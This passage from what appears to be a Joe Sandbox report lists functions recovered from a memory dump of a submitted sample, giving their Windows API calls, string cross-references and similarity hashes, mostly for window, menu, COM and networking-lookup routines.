inet_ntoa.WSOCK32(?), ref: 004A473F
_strcat.LIBCMT ref: 004A474D
_wcscpy.LIBCMT ref: 004A4764
WSACleanup.WSOCK32 ref: 004A4772
_wcscpy.LIBCMT ref: 004A4780

Strings

0.0.0.0, xrefs: 004A471B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: ab63b2027fe3103e1a445ae23a97e3c9dd110008b4d4bcd6deb588523d4d6a10
Instruction ID: 8ac8086d2aec05ff6f60eee93e4bdf1b459674ef2cf79be0b15efcb1109a6d90
Opcode Fuzzy Hash: ab63b2027fe3103e1a445ae23a97e3c9dd110008b4d4bcd6deb588523d4d6a10
Instruction Fuzzy Hash: C7113579500114AFCB50AB309C46EEF77BCEB92315F0041BBF40596191FFBC89858669

Function 004A4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 004A4F7A

Part of subcall function 0046049F: timeGetTime.WINMM(?,76C1B400,00450E7B), ref: 004604A3

Sleep.KERNEL32(0000000A), ref: 004A4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 004A4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004A4FEC
SetActiveWindow.USER32 ref: 004A500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004A5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 004A5038
Sleep.KERNEL32(000000FA), ref: 004A5043
IsWindow.USER32 ref: 004A504F
EndDialog.USER32(00000000), ref: 004A5060

Strings

BUTTON, xrefs: 004A4FDE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a27972556fc27badd3ef562e53b879d39db74d07cae50535a4071065b2a756bf
Instruction ID: b6be4dd28fb54990aad46b3746749f24f8a5c2195cfb735dd04899834c945807
Opcode Fuzzy Hash: a27972556fc27badd3ef562e53b879d39db74d07cae50535a4071065b2a756bf
Instruction Fuzzy Hash: 3221CC74204505BFE7505F30ED84F2F379AEB76745F48103AF101852B1EBB94D199769

Function 004AD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

CoInitialize.OLE32(00000000), ref: 004AD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004AD67D
SHGetDesktopFolder.SHELL32(?), ref: 004AD691
CoCreateInstance.OLE32(004D2D7C,00000000,00000001,004F8C1C,?), ref: 004AD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004AD74C
CoTaskMemFree.OLE32(?,?), ref: 004AD7A4
_memset.LIBCMT ref: 004AD7E1
SHBrowseForFolderW.SHELL32(?), ref: 004AD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004AD840
CoTaskMemFree.OLE32(00000000), ref: 004AD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004AD87E
CoUninitialize.OLE32(00000001,00000000), ref: 004AD880

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 13d47681bebe85e79d924d413240752ccd5931c31f6b139c145146924d90af41
Instruction ID: 358ca0cc02dcd306e1a0e8f4d35ef2aaa0ea8dd7c77c4ad7f32e4455250d5afb
Opcode Fuzzy Hash: 13d47681bebe85e79d924d413240752ccd5931c31f6b139c145146924d90af41
Instruction Fuzzy Hash: 82B12D75A00109AFDB04DFA5C884DAEBBB9FF49314F10846AF90AEB261DB34ED45CB54

Function 0049C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0049C283
GetWindowRect.USER32(00000000,?), ref: 0049C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0049C2F3
GetDlgItem.USER32(?,00000002), ref: 0049C2FE
GetWindowRect.USER32(00000000,?), ref: 0049C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0049C364
GetDlgItem.USER32(?,000003E9), ref: 0049C372
GetWindowRect.USER32(00000000,?), ref: 0049C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0049C3C6
GetDlgItem.USER32(?,000003EA), ref: 0049C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0049C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0049C3FE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 3945f547925fc111e6476a9f37ced7168cc130bc3358fe76cc89fa4cbd13a310
Instruction ID: de492bd03b990dbae2cf19de2596d1a5cc4f4f6cd8a45e24a8d045392ba8fa18
Opcode Fuzzy Hash: 3945f547925fc111e6476a9f37ced7168cc130bc3358fe76cc89fa4cbd13a310
Instruction Fuzzy Hash: 16512B71B00205ABDF18CFA9DD99EAEBBBAEB88710F148139F915D6390D7749D048B14

Function 0044201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00441B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00442036,?,00000000,?,?,?,?,004416CB,00000000,?), ref: 00441B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004420D3
KillTimer.USER32(-00000001,?,?,?,?,004416CB,00000000,?,?,00441AE2,?,?), ref: 0044216E
DestroyAcceleratorTable.USER32(00000000), ref: 0047BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004416CB,00000000,?,?,00441AE2,?,?), ref: 0047BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004416CB,00000000,?,?,00441AE2,?,?), ref: 0047BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004416CB,00000000,?,?,00441AE2,?,?), ref: 0047BD0A
DeleteObject.GDI32(00000000), ref: 0047BD1C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ca4ef272666c6449004eb2657d85a92d9f98e67b2d8b193b8f69e2352db3eaa6
Instruction ID: e1d16b1ae1142b4295c14044423b83afe9594cfdf494f579753967c3d50882a1
Opcode Fuzzy Hash: ca4ef272666c6449004eb2657d85a92d9f98e67b2d8b193b8f69e2352db3eaa6
Instruction Fuzzy Hash: 12618F31100A10DFEB359F15CA48B2B77F2FF50316F94842EE54646A70D7B8A885EF99

Function 004421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004425DB: GetWindowLongW.USER32(?,000000EB), ref: 004425EC

GetSysColor.USER32(0000000F), ref: 004421D3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 049e071a256ea4e8853df656d0bf9c054bfa9df6a5696c443f39e70888719687
Instruction ID: 81a95e47277526c17d175f51fa1058297cd13ff57231cd22547f187ae553f7c0
Opcode Fuzzy Hash: 049e071a256ea4e8853df656d0bf9c054bfa9df6a5696c443f39e70888719687
Instruction Fuzzy Hash: 8741BB31000550DFEB115F28ED48BBA3766FB06331F5842B6FD658A2E1C7B94C42DB69

Function 004AA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,004CF910), ref: 004AA90B
GetDriveTypeW.KERNEL32(00000061,004F89A0,00000061), ref: 004AA9D5
_wcscpy.LIBCMT ref: 004AA9FF

Strings

network, xrefs: 004AA969
removable, xrefs: 004AA93D
cdrom, xrefs: 004AA927
fixed, xrefs: 004AA953
unknown, xrefs: 004AA996
ramdisk, xrefs: 004AA97F
all, xrefs: 004AA911

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 3ae8a13c173addc949cd5e4d1f9e0291a5ffb09da5b227d763032b3ed0c83418
Instruction ID: bf28affec8ebd5e9768150622b1c6c71668dcdc092e4d831739f1c9c6a0a8eb8
Opcode Fuzzy Hash: 3ae8a13c173addc949cd5e4d1f9e0291a5ffb09da5b227d763032b3ed0c83418
Instruction Fuzzy Hash: 8451DE711083009BC700EF15C892AAFB7E9EFA5348F104C2FF5855B2A2DB799D19CA4B

Function 00449837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00449862
__swprintf.LIBCMT ref: 004498AC
__i64tow.LIBCMT ref: 0047F5E6

Strings

True, xrefs: 0047F5A7
%.15g, xrefs: 004498A6
False, xrefs: 0047F5AE
0x%p, xrefs: 0047F5C8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 026ec0233b51c46ca93babd14805db3d397fb9ca1b5a8ce84e1cf0ce38b8bf91
Instruction ID: 0318144f7dcf0298f1df37e2b19ab46c8aa8d4e45011ed2d0f5ba47dd657ce60
Opcode Fuzzy Hash: 026ec0233b51c46ca93babd14805db3d397fb9ca1b5a8ce84e1cf0ce38b8bf91
Instruction Fuzzy Hash: 5341E771510205AEEB24EF39C842ABB73E8EF45304F20486FE549D6292EA399D06971A

Function 004C7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004C716A
CreateMenu.USER32 ref: 004C7185
SetMenu.USER32(?,00000000), ref: 004C7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C7221
IsMenu.USER32(?), ref: 004C7237
CreatePopupMenu.USER32 ref: 004C7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004C726E
DrawMenuBar.USER32 ref: 004C7276

Strings

0, xrefs: 004C7160
F, xrefs: 004C7262

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: a6b202af10e686e8a4c61ef0b38a98b3930d66702d5cdd87783550b7cfa5b807
Instruction ID: b39ab4e9d19b9a808babdb2b52e3f4ce0cb82b6960e460b15b18e1738d4cf129
Opcode Fuzzy Hash: a6b202af10e686e8a4c61ef0b38a98b3930d66702d5cdd87783550b7cfa5b807
Instruction Fuzzy Hash: C3417779A01205EFDB60CF64D988F9ABBB5FF08350F14406AFA05A7361D739A914CF98

Function 004C74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004C755E
CreateCompatibleDC.GDI32(00000000), ref: 004C7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004C7578
SelectObject.GDI32(00000000,00000000), ref: 004C7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 004C758B
DeleteDC.GDI32(00000000), ref: 004C7594
GetWindowLongW.USER32(?,000000EC), ref: 004C759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004C75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004C75BE

Strings

static, xrefs: 004C74F6

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 539005e496667c759b0d22caf0d8e9a992d340f7a854d723adc221d5b17b2785
Instruction ID: e98711211deaf6f8e964564a4ea4b44a4cffaf204aab15483967270c64071005
Opcode Fuzzy Hash: 539005e496667c759b0d22caf0d8e9a992d340f7a854d723adc221d5b17b2785
Instruction Fuzzy Hash: 79318D76104214BBDF519F65DC09FDB3B6AFF09364F10022AFA15921A0C739D815DBA8

Function 00466E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00466E3E

Part of subcall function 00468B28: __getptd_noexit.LIBCMT ref: 00468B28

__gmtime64_s.LIBCMT ref: 00466ED7
__gmtime64_s.LIBCMT ref: 00466F0D
__gmtime64_s.LIBCMT ref: 00466F2A
__allrem.LIBCMT ref: 00466F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00466F9C
__allrem.LIBCMT ref: 00466FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00466FD1
__allrem.LIBCMT ref: 00466FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00467006
__invoke_watson.LIBCMT ref: 00467077

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 40a32ef43d157b8c0feed645cc6377dacfc320980779fa7067fb2f0dc1c81a29
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F2711876A00716ABD714DF69DC41BABB3A8AF04328F10862FF514D7281F779DD00879A

Function 004A2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A2542
GetMenuItemInfoW.USER32(00505890,000000FF,00000000,00000030), ref: 004A25A3
SetMenuItemInfoW.USER32(00505890,00000004,00000000,00000030), ref: 004A25D9
Sleep.KERNEL32(000001F4), ref: 004A25EB
GetMenuItemCount.USER32(?), ref: 004A262F
GetMenuItemID.USER32(?,00000000), ref: 004A264B
GetMenuItemID.USER32(?,-00000001), ref: 004A2675
GetMenuItemID.USER32(?,?), ref: 004A26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004A2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004A2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004A2735

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: ff44ae2d637781785e985a344ac4046f19511f263027ce005a01b6013b1f586e
Instruction ID: f45335e9133b0b55193f24d31878f4d8b186f6484457ee323dc228fc432016c2
Opcode Fuzzy Hash: ff44ae2d637781785e985a344ac4046f19511f263027ce005a01b6013b1f586e
Instruction Fuzzy Hash: 9461C474901249AFDF11CF68CE84DBF7BB9FB26304F14006AE841A7251D7B9AE05EB25

Function 004C6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004C6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004C6FA8
GetWindowLongW.USER32(?,000000F0), ref: 004C6FCC
_memset.LIBCMT ref: 004C6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004C6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004C7067

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 15daea0ce4f1b4742a550887c513098116ebc98511490734c179a35e8675afce
Instruction ID: 4cddac69fb7bb2d742844600e136cf0ec9bd81fe979e72e211ba52a24cf53ee4
Opcode Fuzzy Hash: 15daea0ce4f1b4742a550887c513098116ebc98511490734c179a35e8675afce
Instruction Fuzzy Hash: 53616775A00208AFDB10DFA4CC81FEE77B8EB08704F14419AFA14AB3A1D775A945DFA4

Function 00496B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00496BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00496C18
VariantInit.OLEAUT32(?), ref: 00496C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00496C4A
VariantCopy.OLEAUT32(?,?), ref: 00496C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00496CB1
VariantClear.OLEAUT32(?), ref: 00496CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00496CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00496CDC
VariantClear.OLEAUT32(?), ref: 00496CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00496CF9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 2fcee4ef8d28b2dfa5f49248a57ad3da8249e446fccce1abce766e12991ec9a8
Instruction ID: cf95c7966d1704ca16559a6cebb520e53e5afd7596e30e20d48ad47b15234c01
Opcode Fuzzy Hash: 2fcee4ef8d28b2dfa5f49248a57ad3da8249e446fccce1abce766e12991ec9a8
Instruction Fuzzy Hash: 60418171A001199FCF04DFA9D844DAEBFB9EF18354F01807AF955E7261CB38A949CB98

Function 004B83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

CoInitialize.OLE32 ref: 004B8403
CoUninitialize.OLE32 ref: 004B840E
CoCreateInstance.OLE32(?,00000000,00000017,004D2BEC,?), ref: 004B846E
IIDFromString.OLE32(?,?), ref: 004B84E1
VariantInit.OLEAUT32(?), ref: 004B857B
VariantClear.OLEAUT32(?), ref: 004B85DC

Strings

NULL Pointer assignment, xrefs: 004B84B3
Invalid parameter, xrefs: 004B84FA
Failed to create object, xrefs: 004B8479, 004B852F

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 3b1cea7e1aef692dd53e5cee4975fe51dd989bb061ac64af91237ee7d0491b2f
Instruction ID: 6e9bafd8b11865a824b4e5a32916b70fee41979cbf70820483b2ef81c7cd05dc
